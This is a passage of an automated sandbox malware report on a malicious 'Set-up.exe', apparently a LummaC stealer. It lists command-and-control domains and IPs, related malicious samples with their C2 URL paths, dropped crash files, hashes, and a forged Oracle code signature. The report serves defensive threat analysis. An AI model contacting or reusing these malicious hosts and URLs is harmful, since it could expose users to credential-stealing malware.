https://steamcommunity.com/discussions/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://store.steampowered.com/stats/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://medal.tv	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://broadcast.st.dl.eccdnx.com	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	Set-up.exe, 00000000.00000003.1934108862.0000000000DDA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://store.steampowered.com/steam_refunds/	Set-up.exe, 00000000.00000003.1933857356.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.develop.com	Set-up.exe	false		unknown
https://resinedyw.sbs/	Set-up.exe, 00000000.00000003.1882257795.0000000000D92000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.53.8	sergei-esenin.com	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	sippymroat.cfd	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	drawwyobstacw.sbs	European Union	13335	CLOUDFLARENETUS	true
172.67.152.13	enlargkiw.sbs	United States	13335	CLOUDFLARENETUS	true
104.21.30.221	ehticsprocw.sbs	United States	13335	CLOUDFLARENETUS	true
172.67.141.136	condifendteu.sbs	United States	13335	CLOUDFLARENETUS	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	true
172.67.140.193	vennurviot.sbs	United States	13335	CLOUDFLARENETUS	true
104.21.77.78	resinedyw.sbs	United States	13335	CLOUDFLARENETUS	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1532477
Start date and time:	2024-10-13 11:41:04 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 8s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/5@11/9
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 71% Number of executed functions: 6 Number of non-executed functions: 180
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
05:42:14	API Interceptor	2x Sleep call for process: Set-up.exe modified
05:42:40	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.53.8	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	Setup-Premium.exe	Get hash	malicious	LummaC	Browse
	Solara.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
	file.exe	Get hash	malicious	LummaC	Browse
188.114.97.3	AeYgxx6XFk.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	kitaygorod.top/EternalProcessorMultiwordpressdleTempcentraltemporary.php
	http://host.cloudsonicwave.com	Get hash	malicious	Unknown	Browse	host.cloudsonicwave.com/favicon.ico
	alWUxZvrvU.exe	Get hash	malicious	FormBook	Browse	www.avantfize.shop/q8x9/
	foljNJ4bug.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/fxts/
	RRjzYVukzs.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
	octux.exe.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	1728514626a90de45f2defd8a33b94cf7c156a8c78d461f4790dbeeed40e1c4ac3b9785dda970.dat-decoded.exe	Get hash	malicious	FormBook	Browse	www.jandjacres.net/gwdv/?arl=VZkvqQQ3p3ESUHu9QJxv1S9CpeLWgctjzmXLTk8+PgyOEzxKpyaH9RYCK7AmxPqHPjbm&Ph=_ZX8XrK
	BILL OF LADDING.exe	Get hash	malicious	FormBook	Browse	www.launchdreamidea.xyz/bd77/
	http://embittermentdc.com	Get hash	malicious	Unknown	Browse	embittermentdc.com/favicon.ico
	scan_374783.js	Get hash	malicious	AgentTesla	Browse	paste.ee/d/gvOd3
188.114.96.3	DRAFT DOC2406656.bat.exe	Get hash	malicious	Lokibot	Browse	touxzw.ir/sirr/five/fre.php
	lv961v43L3.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	863811cm.nyafka.top/video_RequestpacketUpdategeneratorPublic.php
	10092024150836 09.10.2024.vbe	Get hash	malicious	FormBook	Browse	www.airgame.store/ojib/
	Hesap-hareketleriniz.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/59fb/
	octux.exe.exe	Get hash	malicious	Unknown	Browse	servicetelemetryserver.shop/api/index.php
	bX8NyyjOFz.exe	Get hash	malicious	FormBook	Browse	www.rtprajalojago.live/2uvi/
	lWfpGAu3ao.exe	Get hash	malicious	FormBook	Browse	www.serverplay.live/71nl/
	sa7Bw41TUq.exe	Get hash	malicious	FormBook	Browse	www.cc101.pro/0r21/
	E_receipt.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/VO2TX
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	filetransfer.io/data-package/fOmsJ2bL/download

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
drawwyobstacw.sbs	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup-Premium.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Solara.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	670937a58778f_LisioFirendes.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	ASmartCore_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Solara.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
vennurviot.sbs	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	104.21.46.170
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Setup-Premium.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Solara.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Loader.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	670937a58778f_LisioFirendes.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	ASmartCore_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	104.21.46.170
	Solara.exe	Get hash	malicious	LummaC	Browse	172.67.140.193
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.46.170
condifendteu.sbs	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	172.67.141.136
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Setup-Premium.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Solara.exe	Get hash	malicious	LummaC	Browse	172.67.141.136
	Loader.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	172.67.141.136
	670937a58778f_LisioFirendes.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	ASmartCore_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Solara.exe	Get hash	malicious	LummaC	Browse	104.21.79.35
	Setup.exe	Get hash	malicious	LummaC	Browse	172.67.141.136
steamcommunity.com	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	C5u5BZq8gj.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	hD2EOjfpfW.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
mathcucom.sbs	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Setup-Premium.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Solara.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Loader.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Wintohdd.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	670937a58778f_LisioFirendes.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	ASmartCore_[1MB]_[unsign].exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Solara.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	Setup.exe	Get hash	malicious	LummaC	Browse	188.114.97.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.FileRepMalware.27261.32754.exe	Get hash	malicious	Unknown	Browse	104.18.11.89
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	SecuriteInfo.com.FileRepMalware.27261.32754.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.FileRepPup.24407.3577.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.FileRepMalware.27261.32754.exe	Get hash	malicious	Unknown	Browse	104.18.11.89
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	SecuriteInfo.com.FileRepMalware.27261.32754.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.FileRepPup.24407.3577.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.FileRepMalware.27261.32754.exe	Get hash	malicious	Unknown	Browse	104.18.11.89
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	SecuriteInfo.com.FileRepMalware.27261.32754.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.FileRepPup.24407.3577.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.FileRepMalware.27261.32754.exe	Get hash	malicious	Unknown	Browse	104.18.11.89
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	SecuriteInfo.com.FileRepMalware.27261.32754.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.FileRepPup.24407.3577.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.FileRepMalware.27261.32754.exe	Get hash	malicious	Unknown	Browse	104.18.11.89
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	SecuriteInfo.com.FileRepMalware.27261.32754.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	172.67.206.204
	SecuriteInfo.com.FileRepPup.24407.3577.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	WxmEM5HgjY.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78
	file.exe	Get hash	malicious	LummaC	Browse	104.21.53.8 188.114.97.3 188.114.96.3 172.67.152.13 104.21.30.221 172.67.141.136 104.102.49.254 172.67.140.193 104.21.77.78

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_Set-up.exe_4c9c2ad393d0b659aa78fea51f43981ea82cba10_6ae3b109_e4f0c861-ae91-41e5-a571-8f8d191fc96d\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	data
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.12713315719208
Encrypted:	false
SSDEEP:	192:ljRU3MX0BU/ojRSetOruLIAzuiFECZ24IO8t:hRuMkBU/ojZ/LIAzuiFPY4IO8t
MD5:	2331A9058FC32F968F1390C4B53FDBC7
SHA1:	D5BF9A9B5FD6DA1CDFBAB3054058669943C7A0DC
SHA-256:	E732C00CD4AD1FBB678F3AA80C0DDFE2A5FB5D89DA6318797235DE1C0E9C484A
SHA-512:	ED79DB42AF84C581247D71ED5C33A0607FE3D6B1BF54361D7AFA5E80912908E54AD4363E5B42665A6013EBE6C5690730B8CEFB5999C18FDF21B523CB0F79CC72
Malicious:	true
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.2.8.6.1.4.4.0.5.0.6.5.9.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.2.8.6.1.4.4.4.7.2.5.2.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.4.f.0.c.8.6.1.-.a.e.9.1.-.4.1.e.5.-.a.5.7.1.-.8.f.8.d.1.9.1.f.c.9.6.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.3.0.e.6.3.0.5.-.9.6.4.2.-.4.8.f.5.-.8.7.5.c.-.6.5.5.4.1.7.3.c.d.3.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.S.e.t.-.u.p...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.c.i.T.E...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.3.f.4.-.0.0.0.1.-.0.0.1.4.-.8.b.d.2.-.6.b.2.7.5.4.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.b.7.b.b.6.9.d.d.7.1.0.3.4.2.2.9.0.4.a.c.a.1.a.4.3.2.7.7.1.f.c.0.0.0.0.0.9.0.4.!.0.0.0.0.b.7.9.c.e.5.0.d.c.a.b.c.1.4.5.5.5.5.a.3.6.e.7.d.9.7.f.3.4.1.6.4.4.1.0.7.1.5.7.b.!.S.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER837C.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun Oct 13 09:42:24 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	134188
Entropy (8bit):	2.0465899784269173
Encrypted:	false
SSDEEP:	768:+GN1vjSKBgNSheKnJoRBx9fs3Jd1Sv/QRS:++ILyJoXfstSv/Q
MD5:	3EB8709A9084E0DC806E543696F79D2E
SHA1:	A361E191616C24D6D5E55251EAFF9B3F64E78729
SHA-256:	4691D1EE252E482F3A1481CC8F037B50AE2A4E12B90819579ED9681B32162853
SHA-512:	DDAFB945958C23105DC5FBA10B7371A7F71B303EE8B7B8BE85A62919F1B52877A533A48BE4B1CB890EC62C93099B35792A0BBA4B3C6F281BBB9EBA12E9471984
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ..........g........................H...(.......T...p%...........R..........`.......8...........T...........xB...............%...........'..............................................................................eJ......H(......GenuineIntel............T.............g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8477.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8354
Entropy (8bit):	3.7003729787765485
Encrypted:	false
SSDEEP:	192:R6l7wVeJMAm6iw76Y9pSU9eYHqgmfNRpr189bsWsfEEm:R6lXJMZ6iw76YDSU9eYHqgmfNes1fO
MD5:	23A57E21F2526728BF79E51255BEADAB
SHA1:	A4CD63467349475A7E6A351EB5DBA4B0335EE60B
SHA-256:	0276DA1C42CC0A17DE823A3F0E073F2EB031D1BA0593CA2D7E9621CDEBC70CBD
SHA-512:	B7C4D876939AC5BACFC15560C43505C5D99F3E5DAF128D2A30683285E2616B09DF06B0610D18735178AC66771132A9834C0E961548C8BC5294172A75C8F087B8
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.0.1.2.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER84A7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4664
Entropy (8bit):	4.496741969809943
Encrypted:	false
SSDEEP:	48:cvIwWl8zsRJg77aI9AbWpW8VY5Ym8M4JuqFMi+q8xFU7Yb6YM4Hd:uIjfjI7iq7VJJUi8U79YM4Hd
MD5:	0E2A733289B51856726560B355F59864
SHA1:	0BB44DEBD47D677DB7268C410A556B757C709D96
SHA-256:	76095A89C700215029A54B6B6CFDFDE18A2EFA9BC61420CD20D996E91EA39119
SHA-512:	E2C9DC2065A130EBFB0C1E6D0BB42BF61D6008EA7F8ED2D717AA1476C2C4E56CB8987F703713C613CD981FF292E2064AE0A98F68DE7AC8D766B0FC3605A4AD7C
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="541485" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465509726421408
Encrypted:	false
SSDEEP:	6144:1IXfpi67eLPU9skLmb0b4FWSPKaJG8nAgejZMMhA2gX4WABl0uNvdwBCswSbn:2XD94FWlLZMM6YFHZ+n
MD5:	00BFAC98A536C86909DADC7CC02EFDD3
SHA1:	0A3DC4CB1CED0530BEAD825EF69482572731B01E
SHA-256:	797450A4C2635DB9BD2C80B9E790D5DA00CFB66406056DFE6F8CED90EA646CD1
SHA-512:	36FF5C6C47B0652B08A670C543317EA02F084890AFB0130422D22404D3594FCB3040D5413A4D8E7B52AB3378A3E54188739AAEF841B0C880F6DBDC68E6C0F690
Malicious:	false
Reputation:	low
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...4T................................................................................................................................................................................................................................................................................................................................................`..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.988381481741982
TrID:	Win32 Executable (generic) a (10002005/4) 98.99% InstallShield setup (43055/19) 0.43% Win32 EXE PECompact compressed (generic) (41571/9) 0.41% Visual Basic Script (13500/0) 0.13% Generic Win/DOS Executable (2004/3) 0.02%
File name:	Set-up.exe
File size:	2'729'072 bytes
MD5:	4b923f3600f76ea3fcf20959d94369ac
SHA1:	b79ce50dcabc145555a36e7d97f341644107157b
SHA256:	b80b75d889d42db1bbd9bc8b748c5c9390bb015286931579c1bcac7562de6a56
SHA512:	54fc3dcb0ff35a97860c0f0b36cdfa310f0b2b918cd810fdca8183faaa150c17b978b6f79c91c65abc7a784cc3ee8ba6b62c29592f87018739096e52608a9031
SSDEEP:	49152:gGSXoV72tpV9XE8Gwi1aCvYMdRluSBw44RGLaLgPZ:Q4OE5wiICvYMpfL1
TLSH:	04C59D22BE8FC532D4A111B1967DAF1F8418A6767F7181D7B2C01A3AE5103E31A3E767
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ark.Ark.Ark...o.Mrk...h.Jrk...n.^rk...j.Erk.H...Brk.H...nrk.Arj..pk...b..rk...k.@rk.....@rk...i.@rk.RichArk................

File Icon


Icon Hash:	2f232d67b7934633

Static PE Info

General

Entrypoint:	0x59ea9c
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6328B684 [Mon Sep 19 18:35:48 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	9f1eb76ab6beb10e56762f8019d97227

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	09/03/2023 00:00:00 11/03/2025 23:59:59
Subject Chain	CN="Oracle America, Inc.", O="Oracle America, Inc.", L=Redwood City, S=California, C=US
Version:	3
Thumbprint MD5:	5F429788727974C52EF1B4CD93D03B8F
Thumbprint SHA-1:	CD7BE0F00F2A5EE102C3037E098AF3F457D3B1AB
